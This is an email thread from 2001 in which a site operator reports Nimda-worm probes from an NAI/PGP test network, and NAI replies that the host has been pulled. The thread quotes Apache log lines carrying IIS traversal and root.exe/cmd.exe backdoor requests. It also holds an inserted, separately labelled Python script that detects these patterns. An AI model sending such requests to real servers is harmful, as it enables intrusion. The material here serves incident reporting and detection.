The following is an e-mail thread between me and PGP after receiving Nimda signature attacks against demonic.com. The last mail I sent was never responded to.
From: jericho@demonic.com
To: hostmaster@NAI.COM, postmaster@pgp.com, pr@NAI.COM, security@NAI.COM, security@pgp.com
Date: Sat, 27 Oct 2001 23:21:29 -0600 (MDT)
Subject: security incident at pgp.com or malicious activity
We received the following hits to demonic.com today. These are typically
the signature of the Nimda worm I believe (reference:
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209).
So I'm curious given the nature of your site..
Is a TIS/PGP host infected with Nimda?
If so, was this oversight on your staff's part? Or did a worm get loose on
your network during testing?
I'm wracking my brain here trying to come up with a valid reason that
a TIS owned IP would be scanning us like this..
Trusted Information Systems (NET-TIS-NET-155) TIS-NET-155
204.254.155.0 - 204.254.155.255
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:56 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
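The request patterns above (root.exe, direct cmd.exe calls, and the double-encoded or overlong-UTF-8 "..\" traversal variants) are what a log-review script can key on to spot Nimda-style probing and to decide whether an abuse report is enough or the server itself needs incident handling. The following is an added example, not code from the thread or from either party; it parses Apache-style access-log lines, flags Nimda markers, and summarizes per source. The sample log embeds six lines from the excerpt above plus two constructed lines from a documentation address (192.0.2.10) to show the one case that matters most to a defender: a probe answered with 2xx.

```python
import re
from collections import Counter

# Apache common/combined log format, as in the access-log excerpt above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request fragments characteristic of Nimda's IIS propagation attempts:
# Code Red II backdoor (root.exe), direct cmd.exe calls, and the
# double-encoded / overlong-UTF-8 "..\" traversal variants in the excerpt.
NIMDA_MARKERS = (
    "root.exe",
    "cmd.exe",
    "%255c",      # "%5c" (backslash) percent-encoded twice
    "%%35c",      # malformed double encoding of "\"
    "%%35%63",
    "%25%35%63",
    "%c0%af",     # overlong UTF-8 for "/"
    "%c0%2f",
    "%c1%1c",     # overlong UTF-8 for "\"
    "%c1%9c",
)

# Constructed sample: first six lines are taken from the excerpt above,
# the last two are made up (192.0.2.10 is a documentation-only address).
SAMPLE_LOG = """\
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:56 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
192.0.2.10 - - [27/Oct/2001:21:02:11 -0600] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
192.0.2.10 - - [27/Oct/2001:21:02:12 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512 "-" "-"
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_nimda_probe(uri):
    """True if the request URI carries any of the Nimda/Code Red markers."""
    u = uri.lower()
    return any(marker in u for marker in NIMDA_MARKERS)


def summarize(lines):
    """Group Nimda probes by source IP (lines assumed in chronological order).

    Per source: probe count, first/last timestamp, per-status counts, and
    how many probes were answered 2xx. A 2xx to one of these requests means
    the traversal or backdoor actually worked on *our* server, which calls
    for incident handling rather than just a complaint to the upstream.
    """
    by_ip = {}
    for raw in lines:
        rec = parse_line(raw.strip())
        if rec is None or not is_nimda_probe(rec["uri"]):
            continue
        entry = by_ip.setdefault(rec["ip"], {
            "probes": 0, "first": rec["ts"], "last": rec["ts"],
            "statuses": Counter(), "served_2xx": 0,
        })
        entry["probes"] += 1
        entry["last"] = rec["ts"]
        entry["statuses"][rec["status"]] += 1
        if rec["status"].startswith("2"):
            entry["served_2xx"] += 1
    return by_ip


def report(summary):
    """Render the summary as lines an abuse report or SOC ticket could carry."""
    out = []
    for ip, e in sorted(summary.items()):
        status_txt = ", ".join(f"{n}x{s}" for s, n in sorted(e["statuses"].items()))
        flag = "  <-- REVIEW: probe(s) answered 2xx" if e["served_2xx"] else ""
        out.append(f"{ip}: {e['probes']} Nimda probes {e['first']} .. "
                   f"{e['last']} ({status_txt}){flag}")
    return out


if __name__ == "__main__":
    for line in report(summarize(SAMPLE_LOG.splitlines())):
        print(line)
```

Run against a real access log (`summarize(open(path))`), the per-source first/last timestamps and status breakdown are exactly what an abuse contact needs to locate the offending host, and the 2xx flag separates "someone scanned us" from "something on our side answered".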
From: IT Security (IT_Security@NAI.com)
To: "'jericho@demonic.com'" (jericho@demonic.com)
Date: Tue, 30 Oct 2001 16:30:55 -0600
Subject: RE: security incident at pgp.com or malicious activity
Thank you for bringing this to our attention.
This network is part of a development and test network in one of our Engineering facilities. The host has now been removed from public access.
Thanks again.
IT Security.
From: jericho@demonic.com
To: IT Security (IT_Security@NAI.com)
Date: Tue, 30 Oct 2001 21:07:37 -0700 (MST)
Subject: RE: security incident at pgp.com or malicious activity
: Thank you for bringing this to our attention.
:
: This network is part of a development and test network in one of our
: Engineering facilities. The host has now been removed from public
: access.
Would you care to comment why a test machine (presumably for internal testing) was network connected and left unchecked so as to allow it to attack other machines?